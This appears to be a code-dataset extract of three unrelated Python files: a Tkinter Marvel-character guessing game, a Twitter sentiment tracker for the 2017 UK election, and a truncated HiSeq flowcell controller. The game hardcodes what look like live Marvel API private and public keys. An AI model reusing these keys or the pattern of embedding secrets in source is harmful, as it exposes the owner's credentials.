source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
GUI Super Wonder Captain V4.2.py
|
# GUI Super Wonder Captain.py
#
import io # Provides to use IO
import datetime # Provides datetime access.
import hashlib # Provides to use hash codes
import json # Provides to use json
import os # Provides miscellaneous operating system interfaces.
import pickle # Provides serializing and de-serializing of Python object structures.
import random # Provides function random for random numbers
import requests # Provides to make requests
import time # Provides time access and conversions.
import threading # Provides to use threads
totalscore = 0
wordcount = 0
remaningpoints = 25
hintsleft = True
addpoints = True
from tkinter import * # Tkinter GUI for Python 3.X
from tkinter import messagebox # Tkinter messagebox
from PIL import Image, ImageTk # Allows for image formats other than gif
from urllib.request import urlopen # Allows to use url
def getHighScore():
try:
file = open("scores.txt", "r")
names = []
scores = []
highscores = ""
for line in file:
currentline = line.split(",")
name = currentline[0].replace("\n", "").split("\n")
names.append(name)
score = currentline[1].replace("\n", "").split("\n")
scores.append(score)
for n, s in zip(names, scores):
highscores += "\n" + "".join(n) + ": " + "".join(s)
return highscores
except:
return ""
def getTodaysHighScore():
try:
name = ""
highscore = 0
file = open("scores.txt", "r")
for line in file:
line = line.split(",")
times = line[2].replace("\n", "").split("\n") #stores the times of the scores in scores.txt
file.close()
file = open("scores.txt", "r")
for line in file:
if str(datetime.date.today()) in line: #checks for each date if it matches today's date
line = line.split(",")
scores = line[1].replace("\n", "").split("\n") #stores today's scores
for score in scores:
if int(score) > highscore:
highscore = int(score) #assigns the highest score to highscore variable
file.close()
file = open("scores.txt", "r")
for line in file:
if str(highscore) in line: #matches the highscore to the line in which it occurs
line = line.split(",")
name = line[0].replace("\n", "").split("\n") #stores the name of the scores in scores.txt
return "".join(name) + ": " + str(highscore)
except:
return ""
def sendScoreToFile():
global totalscore
if totalscore < 0: #if totalscore is smaller than 0, there are no points to be scored anymore
totalscore = 0
file = open("scores.txt", "a") #open scores.txt in append mode
output = nameVar.get() + "," + str(totalscore) + "," + str(datetime.date.today())
file.write(output + "\n") #writes to scores.txt the name of player, the score and today's date
file.close()
def correctAnswer():
global totalscore
global remaningpoints
totalscore += 25 #correct answer
remaningpoints = 0
Scores(root)
def falseAnswer():
global totalscore
global remaningpoints
totalscore -= 1 #wrong answer
if remaningpoints < 1:
remaningpoints = 0
else:
remaningpoints -= 1
Scores(root)
def giveHint():
global totalscore
global remaningpoints
totalscore -= 3 #hint
if remaningpoints < 3: #ensures that the remaning points does not go lower than 0
remaningpoints = 0
elif hintsleft:
remaningpoints -= 3
Scores(root)
def play():
global hintsleft
hintsleft = True
if nameVar.get() == "":
messagebox.showerror("Error", "Please enter a name and press play!")
else:
global wordcount, randomcharacters, remaningpoints
hintsleft = True
wordcount = 0
randomcharacters = getrndchars(getcharlist())
Characters(root)
Description(root)
remaningpoints = 25
Scores(root)
def hint():
giveHint()
Description(root)
def giveUP():
global remaningpoints
remaningpoints = 0
messagebox.showwarning("Warning", "Nope!!")
Scores(root)
def charButtons(i):
global addpoints
global totalscore
global remaningpoints
if i == 0:
if nameofchartoguess == randomcharacters[0][0]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 1:
if nameofchartoguess == randomcharacters[0][1]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 2:
if nameofchartoguess == randomcharacters[0][2]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 3:
if nameofchartoguess == randomcharacters[0][3]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 4:
if nameofchartoguess == randomcharacters[0][4]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 5:
if nameofchartoguess == randomcharacters[0][5]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 6:
if nameofchartoguess == randomcharacters[0][6]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 7:
if nameofchartoguess == randomcharacters[0][7]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 8:
if nameofchartoguess == randomcharacters[0][8]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
elif i == 9:
if nameofchartoguess == randomcharacters[0][9]:
addpoints = False
messagebox.showinfo("Correct!", "Congratulations!!!")
correctAnswer()
sendScoreToFile()
totalscore = 0
play()
else:
falseAnswer()
def exit():
# Put here everything you want to close by exit
root.destroy()
def info():
messagebox.showinfo("Made by", "Game developed by Azzeddine, Abdel, Glenn, Kamal, Laurens & Sem")
def rules():
messagebox.showinfo("Rules...", "You start with 25 points\n"
"If you press the wrong character button you lose 1 point\n"
"If you press the hint button you lose 3 points\n"
"If you press the giveup button you lose all points\n"
"Have fun playing this game!")
class Initialize:
def __init__(self, master):
master.resizable(0, 0)
master.title("Super Wonder Captain")
master.wm_iconbitmap('Marvel.ico')
global background_image
background_image = PhotoImage(file="Background.png")
background_label = Label(master, image=background_image)
background_label.place(x=0, y=0, relwidth=1, relheight=1)
global w, h
w = background_image.width()
h = background_image.height()
master.geometry('%dx%d+0+0' % (w, h))
menubar = Menu(master)
master.config(menu=menubar)
gameMenu = Menu(menubar)
menubar.add_cascade(label="Game...", menu=gameMenu)
gameMenu.add_command(label="Play!!", command=play)
gameMenu.add_separator()
gameMenu.add_command(label="Exit", command=exit)
helpMemu = Menu(menubar)
menubar.add_cascade(label="Help", menu=helpMemu)
helpMemu.add_command(label="Rules", command=rules)
helpMemu.add_command(label="Info", command=info)
statusBarFrame = Frame(master)
statusBarFrame.pack(side=BOTTOM, fill=X)
self.statusBar = Label(statusBarFrame, text="Data provided by Marvel. © 2014 Marvel", bd=1, relief=SUNKEN)
self.statusBar.pack(side=LEFT, fill=X)
global progress
progress = StringVar()
self.status = Label(statusBarFrame, textvariable=progress, bd=1, relief=SUNKEN)
self.status.pack(side=RIGHT, fill=X)
class User:
def __init__(self, master):
# frame specs
userFrame = Frame(master)
#userFrame.pack(anchor=NW)
userFrame.place(x=5, y=10)
# label name for entry field
self.label = Label(userFrame, text="Name")
self.label.grid(row=0, column=0, sticky=E)
global nameVar
nameVar = StringVar() # String variable
# Entry field
self.name = Entry(userFrame, textvariable=nameVar)
self.name.grid(row=0, column=1)
class Buttons:
def __init__(self, master):
# frame specs
buttonFrame1 = Frame(master)
buttonFrame1.place(x=5, y=35)
# Buttons
#global playButton, exitButton
self.playButton = Button(buttonFrame1, text='Play', command=play, height=2, width=10)
self.playButton.grid(row=0, column=0, sticky=W)
#self.playButton.config(state=DISABLED)
self.exitButton = Button(buttonFrame1, text='Exit', command=exit, height=2, width=10)
self.exitButton.grid(row=0, column=1, padx=5, sticky=E)
#self.exitButton.config(state=DISABLED)
class Scores:
def __init__(self, master):
scoreFrame = Frame(master) # select of names
#scoreFrame.pack(anchor=NE)
scoreFrame.place(x=w, y=0, anchor=NE)
labelFrame = Frame(master)
labelFrame.place(x=w-130, y=0, anchor=NE)
labelHS = Label(labelFrame, text=" Highscores: ", font=("Helvetica", 10))
labelHS.grid(row=0, column=2, sticky=E)
scroll = Scrollbar(scoreFrame, orient=VERTICAL)
text = Text(scoreFrame, height=10, width=15, font=("Helvetica", 10))
scroll.config(command=text.yview)
text.config(yscrollcommand=scroll.set)
scroll.pack(side=RIGHT, fill=Y)
text.pack(side=LEFT, fill=BOTH, expand=1)
text.insert(END, getHighScore())
text.configure(state=DISABLED)
labelTS = Label(labelFrame, text="Today highscore: ", font=("Helvetica", 10))
labelTS.grid(row=0, column=0, sticky=E)
textTS = Text(labelFrame, height=1, width=15, font=("Helvetica", 10))
textTS.grid(row=0, column=1, sticky=E)
textTS.insert(END, getTodaysHighScore())
textTS.configure(state=DISABLED)
labelRP = Label(labelFrame, text="Remaining points: ", font=("Helvetica", 10))
labelRP.grid(row=1, column=0, sticky=E)
textRP = Text(labelFrame, height=1, width=15, font=("Helvetica", 10))
textRP.grid(row=1, column=1, sticky=E)
textRP.insert(END, remaningpoints)
textRP.configure(state=DISABLED)
class Description:
def __init__(self, master):
# frame specs
QuestionFrame = Frame(master)
QuestionFrame.place(x=w/2, y=(200), anchor=S)
DiscriptionFrame = Frame(master)
DiscriptionFrame.place(x=w/2, y=(h/2-20), anchor=S)
Question = Label(QuestionFrame, text="Choose a character by this description", font=("Helvetica", 16))
Question.grid(row=0, column=0)
Appels = givehint(randomcharacters)
scroll = Scrollbar(DiscriptionFrame, orient=VERTICAL)
text = Text(DiscriptionFrame, height=5, width=80, font=("Helvetica", 12))
scroll.config(command=text.yview)
text.config(yscrollcommand=scroll.set)
scroll.pack(side=RIGHT, fill=Y)
text.pack(side=LEFT, fill=BOTH, expand=1)
if Appels != "ok" and Appels != "":
text.insert(END, Appels[1])
text.configure(state=DISABLED)
class Characters:
def __init__(self, master):
characterFrame = Frame(master)
characterFrame.place(x=(w/2), y=h/2, anchor=N)
global image
image = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
for i in image:
image[i] = self.loadPic(getcharlist().get(randomcharacters[0][i])[1])
self.label = Label(characterFrame, text=randomcharacters[0][i][:15])
self.label.grid(row=0, column=i)
self.character = Button(characterFrame, image=image[i], command=lambda i=i: charButtons(i))
self.character.grid(row=1, column=i)
buttonFrame = Frame(master)
buttonFrame.place(x=w/2, y=h-100, anchor=S)
self.hintButton = Button(buttonFrame, text='Hint!', command=hint, height=3, width=15)
self.hintButton.grid(row=0, column=0, sticky=W)
self.giveUpButton = Button(buttonFrame, text='Give up!', command=giveUP, height=3, width=15)
self.giveUpButton.grid(row=0, column=1, sticky=E)
def loadPic(self, url):
image_bytes = urlopen(url).read()
# internal data file
data_stream = io.BytesIO(image_bytes)
# open as a PIL image object
pil_image = Image.open(data_stream)
# convert PIL image object to Tkinter PhotoImage object
pil_image = pil_image.resize((100, 100), Image.ANTIALIAS)
# Resize to (250, 250) is (height, width)
return ImageTk.PhotoImage(pil_image)
def loadScreen(x):
if x > 100:
progress.set("Building completed! {} characters loaded".format(str(x)))
#playButton.config(state=NORMAL)
#exitButton.config(state=NORMAL)
else:
progress.set("Building character-list; 100 needed: {}".format(str(x)))
# This function will check if there is a up-to-date file with all the character data.
# If there isn't one, this function will create and or update the file.
def getcharlist():
# Try to get the file modified date. If it's equal to the system date, open the file and return it's content.
# If it's not, or the file doesn't exist, create or update it. Then open it and return it's content.
try:
if str(datetime.datetime.fromtimestamp(os.path.getmtime('characters.pck'))).split()[0] == time.strftime("%Y-%m-%d"):
build = False
else:
build = True
except OSError:
build = True
if build:
characterlist = {} # Will hold the information of 100+ characters.
offset = 0 # Will be used to get the next set of 100 characters.
# Connection information.
baseurl = "http://gateway.marvel.com:80/v1/public/characters"
private_key = "ac844ec2eeadb045d5a099248aaad6b0ba944448"
public_key = "01e99d019cdb13d44f3ec962cd0b04ad"
# Keep asking for 100 more until we have a list of 100+ characters that meets our criteria.
while len(characterlist) < 100:
# Build the connection URL.
timestamp = str(time.time())
hash = hashlib.md5( (timestamp+private_key+public_key).encode('utf-8') )
md5digest = str(hash.hexdigest())
connection_url = baseurl + "?ts=" + timestamp + "&limit=100&offset=" + str(offset) + "&apikey=" + public_key + "&hash=" + md5digest
# Get the information
response = requests.get(connection_url)
jsontext = json.loads(response.text)
# Stop if we get an empty list of characters
if len(jsontext['data']['results']) == 0:
break
# Add 100 to the offset so we'll get the next 100 characters next time instead of the same ones.
offset += 100
# Read all the 100 characters we gor from the response.
# If one meets our criteria, we can harvest the information we need and add this character to our list.
for item in jsontext['data']['results']:
if len(item['description']) > 25 and item['thumbnail']['path'][-19:] != "image_not_available":
characterlist[item['name']] = [item['description'], item['thumbnail']['path'] + "." + item['thumbnail']['extension']]
loadScreen(len(characterlist)) # Indication of how manny characters we already have.
# Open/create the file 'characters.pck' and store our characterlist.
with open('characters.pck', 'wb') as picklefile:
pickle.dump(characterlist, picklefile)
# Return the characterlist so other functions can use it.
return characterlist
else:
# Read the file 'characters.pck' and read it's content.
with open('characters.pck', 'rb') as picklefile:
characterlist = pickle.load(picklefile)
loadScreen(len(characterlist)) # Indication of how manny characters we have.
# Return the characterlist so other functions can use it.
return characterlist
# This function will get ten random character names from the masterlist.
# Then it wil pick a random character of those 10 characters and get the description of it.
# The description of this character wil then be altered so the name of the character won't be in the hints.
def getrndchars(characterlist):
rndnames = [] # Will hold ten random character names.
chartoguess = [] # Will hold the character data of the character that has to be guessed.
texttoremove = [] # Will hold the names of the character that has to be guessed.
# Pick a random character from the masterlist until we have ten.
while len(rndnames) < 10:
name = random.choice(list(characterlist.keys()))
# Be sure the random name we picked is not already in the list. Add it if it isn't.
if name not in rndnames:
rndnames.append(name)
# Pick a random name from the list with ten names we just build and add it to a list.
global nameofchartoguess
nameofchartoguess = random.choice(rndnames)
chartoguess.append(nameofchartoguess)
# Get all the details we need of the character from the masterlist and add this to the list.
chartoguess.append(characterlist.get(nameofchartoguess))
# Split the name of the character.
texttoremove = str.split(nameofchartoguess)
# Replace all the occurrences of the characters names in the description with '...'
for key in texttoremove:
chartoguess[1][0] = chartoguess[1][0].replace(key, '...')
# Split the characters description.
chartoguess[1][0] = str.split(chartoguess[1][0])
# Return the ten random names and the character that has to be guessed.
return rndnames, chartoguess
# This function will return a part of the description of the character that has to be guessed.
def givehint(chartoguess):
global wordcount
wordcount += 10 # Will hold the amount of words there are already given.
# Return ten words from the description if there are still words lef
if wordcount < (len(chartoguess[1][1][0]) + 10):
hint = "{0}".format(" ".join(str(i) for i in chartoguess[1][1][0][:wordcount]))
return 'Here is your hint: ', hint
else:
global hintsleft
hintsleft = False
return messagebox.showinfo("Sorry", "Sorry out of hints!"), chartoguess[1][1][0]
def main():
global root
root = Tk()
Initialize(root)
User(root)
Buttons(root)
threading.Thread(target=getcharlist).start()
root.mainloop()
if __name__ == "__main__":
main()
|
twitter_sentiment_election.py
|
import threading
import json
from time import sleep
import twitter
from nltk.sentiment.vader import SentimentIntensityAnalyzer
# Define Twitter OAuth credentials.
CONSUMER_KEY = "CONSUMER_KEY"
CONSUMER_SECRET = "CONSUMER_SECRET"
ACCESS_TOKEN = "ACCESS_TOKEN"
ACCESS_TOKEN_SECRET = "ACCESS_TOKEN_SECRET"
# Define search language and keywords for stream
LANGUAGES = ['en']
SEARCH_TERMS = ["GE2017", "GeneralElection", "Labour", "Conservatives", "Lib Dems", "SNP", "Theresa May",
"Tim Farron", "Corbyn", "Liberal Democrats", "GE", "GE17", "Farron", "Scottish National Party",
"election"]
# Define keywords for determining the party each tweet discusses on
CON_WORDS = ["conservatives", "tory", "tories", "conservative", "theresa may", "may", "theresa"]
LAB_WORDS = ["labour", "lab", "jeremy corbyn", "corbyn"]
LIB_WORDS = ["lib dem", "lib dems", "lib", "liberal", "democrats", "farron"]
SNP_WORDS = ["snp", "nicola sturgeon", "scottish national party", "sturgeon"]
def get_tweets(tweets):
"""
Connects to the Twitter API using python-twitter and starts a stream connection based on the keywords provided.
Takes as input a list of tweets and adds to it.
Tweets are preferred in their extended (not truncated) form.
"""
api = twitter.Api(consumer_key=CONSUMER_KEY,
consumer_secret=CONSUMER_SECRET,
access_token_key=ACCESS_TOKEN,
access_token_secret=ACCESS_TOKEN_SECRET,
tweet_mode='extended',
sleep_on_rate_limit=True)
for line in api.GetStreamFilter(track=SEARCH_TERMS, languages=LANGUAGES):
try:
if line['truncated']:
tweets.append(line['extended_tweet']['full_text'].rstrip('\r\n'))
else:
tweets.append(line['text'].rstrip('\r\n'))
except KeyError as e:
print("Malformed/unexpected JSON - likely a truncated tweet.")
print(e)
return tweets
def get_tweet_sentiment(tweets):
"""
Uses the VADER SentimentIntensityAnalyzer from NLTK to classify tweet sentiment polarity.
Takes in input a list of tweets (text-only, not JSON).
Checks which party a tweet refers to and averages the score for all tweets for each party.
Returns a dictionary of the parties and their average sentiment score (compound).
"""
scores = {"con": [], "lab": [], "lib": [], "snp": []}
averages = {"con": [], "lab": [], "lib": [], "snp": []}
sid = SentimentIntensityAnalyzer()
for tweet in tweets:
ss = sid.polarity_scores(tweet.replace("#", "")) # get the sentiment analysis scores for each tweet
c_score = ss['compound'] # take the compound score, between -1 and 1
if any(word in tweet.lower() for word in CON_WORDS):
scores['con'].append(c_score)
if any(word in tweet.lower() for word in LAB_WORDS):
scores['lab'].append(c_score)
if any(word in tweet.lower() for word in LIB_WORDS):
scores['lib'].append(c_score)
if any(word in tweet.lower() for word in SNP_WORDS):
scores['snp'].append(c_score)
for party, score_list in scores.items():
if len(score_list) != 0:
average = sum(score_list)/len(score_list) # average sentiment per party per tweet
else:
average = 0
averages[party] = average
return averages
def save_scores(scores_dict):
"""
Saves the scores in a dictionary to a JSON file to be read by the website wrapper.
"""
total = 0
for party, score in scores_dict.items():
total += abs(score)
if total == 0: # if no sentiment, set 25% as the default width on the page
scores_dict.update({party: .25 for party, s in scores_dict.items()})
else:
scores_dict.update({party: score * (1/total) for party, score in current_scores.items()})
with open('scores.json', 'w') as f: # write the JSON to file (overwriting previous)
json.dump(current_scores, f)
if __name__ == "__main__":
"""
Analyses General Election Tweet Sentiment using VADER with NLTK.
Author: Xav Kearney
April 23rd 2017
Live Version: http://xavkearney.com/sentiment
Requirements:
https://github.com/bear/python-twitter
http://www.nltk.org/ with VADER lexicon.
"""
tweet_list = []
tweet_stream = threading.Thread(target=get_tweets, args=(tweet_list,))
tweet_stream.start()
moving_averages = {"con": [], "lab": [], "lib": [], "snp": []}
current_scores = {"con": [], "lab": [], "lib": [], "snp": []}
while True:
sleep(2) # takes approx 2s to get a reasonable number of tweets
averages = get_tweet_sentiment(tweet_list) # get the average sentiment per tweet
for party, score in averages.items():
if len(moving_averages[party]) > 4: # keep a moving average of 3 time periods
del moving_averages[party][-1]
moving_averages[party].insert(0, score)
current_scores[party] = sum(moving_averages[party])/len(moving_averages[party])
print("Current party scores: ".format(current_scores))
save_scores(current_scores)
if len(tweet_list) > 1000:
tweet_list.clear()
print("Reset the tweet list.")
|
main.py
|
"""
TODO:
"""
import time
import logging
import os
from os.path import join
import sys
import configparser
import threading
import argparse
from . import methods
from . import args
from . import focus
# Global int to track # of errors during start up
def error(*args):
"""Keep count of errors and print to logger and/or console."""
global n_errors
i = 0
if isinstance(args[0], logging.Logger):
logger = args[0]
i = 1
msg = 'ERROR::'
for a in args[i:]:
msg = msg + str(a) + ' '
if i is 0:
print(msg)
else:
logger.log(21, msg)
n_errors += 1
return n_errors
##########################################################
## Flowcell Class ########################################
##########################################################
class Flowcell():
"""HiSeq 2500 System :: Flowcell
**Attributes:**
- position (str): Flowcell is at either position A (left slot )
or B (right slot).
- recipe_path (path): Path to the recipe.
- recipe (file): File handle for the recipe.
- first_line (int): Line number for the recipe to start from on the
initial cycle.
- cycle (int): The current cycle.
- total_cycles (int): Total number of the cycles for the experiment.
- history ([[int,],[str,],[str,]]): Timeline of flowcells events, the
1st column is the timestamp, the 2nd column is the event, and the
3rd column is an event specific detail.
- sections (dict): Dictionary of section names keys and coordinate
positions of the sections on the flowcell values.
- stage (dict): Dictionary of section names keys and stage positioning
and imaging details of the sections on the flowcell values.
- thread (int): Thread id of the current event on the flowcell.
- signal_event (str): Event that signals the other flowcell to continue
- wait_thread (threading.Event()): Blocks other flowcell until current
flowcell reaches signal event.
- waits_for (str): Flowcell A waits for flowcell B and vice versa.
- pump_speed (dict): Dictionary of pump scenario keys and pump speed
values.
- volume (dict): Keys are events/situations and values are volumes
in uL to use at the event/situation.
- filters (dict): Dictionary of filter set at each cycle, c: em, ex1, ex2.
- IMAG_counter (None/int): Counter for multiple images per cycle.
- events_since_IMAG (list): Record events since last IMAG step.
- temp_timer: Timer to check temperature of flowcell.
- temperature (float): Set temperature of flowcell in °C.
- temp_interval (float): Interval in seconds to check flowcell temperature.
- z_planes (int): Override number of z planes to image in recipe.
- pre_recipe_path (path): Recipe to run before actually starting experiment
- pre_recipe (file): File handle for the pre recipe.
"""
def __init__(self, position):
"""Constructor for flowcells
**Parameters:**
- position (str): Flowcell is at either position A (left slot) or
B (right slot).
"""
self.recipe_path = None
self.recipe = None
self.first_line = None
self.cycle = 0 # Current cycle
self.total_cycles = 0 # Total number of cycles for experiment
self.history = [[],[],[]] # summary of events in flowcell history
self.sections = {} # coordinates of flowcell of sections to image
self.stage = {} # stage positioning info for each section
self.thread = None # threading to do parallel actions on flowcells
self.signal_event = None # defines event that signals the next flowcell to continue
self.wait_thread = threading.Event() # blocks next flowcell until current flowcell reaches signal event
self.waits_for = None # position of the flowcell that signals current flowcell to continue
self.pump_speed = {}
self.volume = {'main':None,'side':None,'sample':None,'flush':None} # Flush volume
self.filters = {} # Dictionary of filter set at each cycle, c: em, ex1, ex2
self.IMAG_counter = None # Counter for multiple images per cycle
self.events_since_IMAG = [] # List events since last IMAG step
self.temp_timer = None # Timer to check temperature of flowcell
self.temperature = None # Set temperature of flowcell
self.temp_interval = None # Interval in minutes to check flowcell temperature
self.z_planes = None # Override number of z planes to image in recipe.
self.pre_recipe_path = None # Recipe to run before actually starting experiment
while position not in ['A', 'B']:
print('Flowcell must be at position A or B')
position = input('Enter A or B for ' + str(position) + ' : ')
self.position = position
def addEvent(self, event, command):
"""Record history of events on flow cell.
**Parameters:**
- instrument (str): Type of event can be valv, pump, hold, wait, or
imag.
- command (str): Details specific to each event such as hold time,
buffer, event to wait for, z planes to image, or pump volume.
**Returns:**
- int: A time stamp of the last event.
"""
self.history[0].append(time.time()) # time stamp
self.history[1].append(event) # event (valv, pump, hold, wait, imag)
self.history[2].append(command) # details such hold time, buffer, event to wait for
self.events_since_IMAG.append(event)
if event is 'PORT':
self.events_since_IMAG.append(command)
if event in ['IMAG', 'STOP']:
self.events_since_IMAG.append(event)
return self.history[0][-1] # return time stamp of last event
def restart_recipe(self):
"""Restarts the recipe and returns the number of completed cycles."""
# Restart recipe
if self.recipe is not None:
self.recipe.close()
self.recipe = open(self.recipe_path)
# Reset image counter (if mulitple images per cycle)
if self.IMAG_counter is not None:
self.IMAG_counter = 0
msg = 'PySeq::'+self.position+'::'
if self.cycle == self.total_cycles:
# Increase cycle counter
self.cycle += 1
# Flowcell completed all cycles
hs.message(msg+'Completed '+ str(self.total_cycles) + ' cycles')
hs.T.fc_off(fc.position)
self.temperature = None
do_rinse(self)
if self.temp_timer is not None:
self.temp_timer.cancel()
self.temp_timer = None
self.thread = threading.Thread(target = time.sleep, args = (10,))
elif self.cycle < self.total_cycles:
# Increase cycle counter
self.cycle += 1
# Start new cycle
restart_message = msg+'Starting cycle '+str(self.cycle)
self.thread = threading.Thread(target = hs.message,
args = (restart_message,))
else:
self.thread = threading.Thread(target = time.sleep, args = (10,))
thread_id = self.thread.start()
return self.cycle
def pre_recipe(self):
"""Initializes pre recipe before starting experiment."""
prerecipe_message = 'PySeq::'+self.position+'::'+'Starting pre recipe'
self.recipe = open(self.prerecipe_path)
self.thread = threading.Thread(target = hs.message,
args = (prerecipe_message,))
thread_id = self.thread.start()
return thread_id
def endHOLD(self):
"""Ends hold for incubations in buffer, returns False."""
msg = 'PySeq::'+self.position+'::cycle'+str(self.cycle)+'::Hold stopped'
hs.message(msg)
return False
##########################################################
## Setup Flowcells #######################################
##########################################################
def setup_flowcells(first_line, IMAG_counter):
"""Read configuration file and create flowcells.
**Parameters:**
- first_line (int): Line number for the recipe to start from on the
initial cycle.
**Returns:**
- dict: Dictionary of flowcell position keys with flowcell object values.
"""
err_msg = 'ConfigFile::sections::'
experiment = config['experiment']
method = experiment['method']
method = config[method]
flowcells = {}
for sect_name in config['sections']:
f_sect_name = sect_name.replace('_','') #remove underscores
position = config['sections'][sect_name]
AorB, coord = position.split(':')
# Create flowcell if it doesn't exist
if AorB not in flowcells.keys():
fc = Flowcell(AorB)
fc.recipe_path = experiment['recipe path']
fc.first_line = first_line
fc.volume['main'] = int(method.get('main prime volume', fallback=500))
fc.volume['side'] = int(method.get('side prime volume', fallback=350))
fc.volume['sample'] = int(method.get('sample prime volume', fallback=250))
fc.volume['flush'] = int(method.get('flush volume', fallback=1000))
fs = int(method.get('flush flowrate',fallback=700))
fc.pump_speed['flush'] = fs
ps = int(method.get('prime flowrate',fallback=100))
fc.pump_speed['prime'] = ps
rs = int(method.get('reagent flowrate', fallback=40))
fc.pump_speed['reagent'] = rs
fc.total_cycles = int(config.get('experiment','cycles'))
fc.temp_interval = float(method.get('temperature interval', fallback=5))*60
z_planes = int(method.get('z planes', fallback=0))
if z_planes > 0:
fc.z_planes = z_planes
if IMAG_counter > 1:
fc.IMAG_counter = 0
fc.prerecipe_path = method.get('pre recipe', fallback = None)
flowcells[AorB] = fc
# Add section to flowcell
if sect_name in flowcells[AorB].sections:
error(err_msg, sect_name, 'duplicated on flowcell', AorB)
else:
coord = coord.split(',')
flowcells[AorB].sections[f_sect_name] = [] # List to store coordinates of section on flowcell
flowcells[AorB].stage[f_sect_name] = {} # Dictionary to store stage position of section on flowcell
if float(coord[0]) < float(coord[2]):
error(err_msg,'Invalid x coordinates for', sect_name)
if float(coord[1]) < float(coord[3]):
error(err_msg, 'Invalid y coordinates for', sect_name)
for i in range(4):
try:
flowcells[AorB].sections[f_sect_name].append(float(coord[i]))
except:
error(err_msg,' No position for', sect_name)
# if runnning mulitiple flowcells...
# Define first flowcell
# Define prior flowcell signals to next flowcell
if len(flowcells) > 1:
flowcell_list = [*flowcells]
for fc in flowcells.keys():
flowcells[fc].waits_for = flowcell_list[
flowcell_list.index(fc)-1]
if experiment['first flowcell'] not in flowcells:
error('ConfigFile::First flowcell does not exist')
if isinstance(IMAG_counter, int):
error('Recipe::Need WAIT before IMAG with 2 flowcells.')
# table = {}
# for fc in flowcells:
# table[fc] = flowcells[fc].sections.keys()
# print('Flowcell section summary')
# print(tabulate.tabulate(table, headers = 'keys', tablefmt = 'presto'))
#
# userYN('Confirm flowcell(s)')
return flowcells
##########################################################
## Parse lines from recipe ###############################
##########################################################
def parse_line(line):
"""Parse line and return event (str) and command (str).
If line starts with the comment character, #, then None is return for
both event and command.
"""
comment_character = '#'
#delimiter = '\t'
no_comment = line.split(comment_character)[0] # remove comment
sections = no_comment.split(':')
if len(sections) == 2:
event = sections[0].strip() # first section is event
event = event[0:4] # event identified by first 4 characters
command = sections[1] # second section is command
command = command.strip() # remove space
else:
event = None
command = None
return event, command
##########################################################
## Setup Logging #########################################
##########################################################
def setup_logger():
"""Create a logger and return the handle."""
# Get experiment info from config file
experiment = config['experiment']
experiment_name = experiment['experiment name']
# Make directory to save data
save_path = join(experiment['save path'],experiment_name)
if not os.path.exists(save_path):
os.mkdir(save_path)
# Make directory to save logs
log_path = join(save_path, experiment['log path'])
if not os.path.exists(log_path):
os.mkdir(log_path)
# Create a custom logger
logger = logging.getLogger(__name__)
logger.setLevel(10)
# Create console handler
c_handler = logging.StreamHandler()
c_handler.setLevel(21)
# Create file handler
f_log_name = join(log_path,experiment_name + '.log')
f_handler = logging.FileHandler(f_log_name)
f_handler.setLevel(logging.INFO)
# Create formatters and add it to handlers
c_format = logging.Formatter('%(asctime)s - %(message)s', datefmt = '%Y-%m-%d %H:%M')
f_format = logging.Formatter('%(asctime)s - %(message)s')
c_handler.setFormatter(c_format)
f_handler.setFormatter(f_format)
# Add handlers to the logger
logger.addHandler(c_handler)
logger.addHandler(f_handler)
# Save copy of config with log
config_path = join(log_path,'config.cfg')
with open(config_path, 'w') as configfile:
config.write(configfile)
return logger
def configure_instrument(IMAG_counter, port_dict):
"""Configure and check HiSeq settings."""
global n_errors
model, name = methods.get_machine_info(args_['virtual'])
if model is not None:
config['experiment']['machine'] = model+'::'+name
experiment = config['experiment']
method = experiment['method']
method = config[method]
try:
total_cycles = int(experiment.get('cycles'))
except:
error('ConfigFile:: Cycles not specified')
# Creat HiSeq Object
if model == 'HiSeq2500':
if args_['virtual']:
from . import virtualHiSeq
hs = virtualHiSeq.HiSeq(name, logger)
hs.speed_up = int(method.get('speed up', fallback = 5000))
else:
import pyseq
com_ports = pyseq.get_com_ports()
hs = pyseq.HiSeq(name, logger)
else:
sys.exit()
# Check side ports
try:
side_ports = method.get('side ports', fallback = '9,21,22,23,24')
side_ports = side_ports.split(',')
side_ports = list(map(int, side_ports))
except:
error('ConfigFile:: Side ports not valid')
# Check sample port
try:
sample_port = int(method.get('sample port', fallback = 20))
except:
error('ConfigFile:: Sample port not valid')
# Check barrels per lane make sense:
n_barrels = int(method.get('barrels per lane', fallback = 1)) # Get method specific pump barrels per lane, fallback to 1
if n_barrels not in [1,2,4,8]:
error('ConfigFile:: Barrels per lane must be 1, 2, 4 or 8')
# Check inlet ports, note switch inlet ports in initialize_hs
inlet_ports = int(method.get('inlet ports', fallback = 2))
if inlet_ports not in [2,8]:
error('MethodFile:: inlet ports must be 2 or 8.')
variable_ports = method.get('variable reagents', fallback = None)
hs.z.image_step = int(method.get('z position', fallback = 21500))
hs.overlap = abs(int(method.get('overlap', fallback = 0)))
hs.overlap_dir = method.get('overlap direction', fallback = 'left').lower()
if hs.overlap_dir not in ['left', 'right']:
error('MethodFile:: overlap direction must be left or right')
for fc in flowcells.values():
AorB = fc.position
hs.v24[AorB].side_ports = side_ports
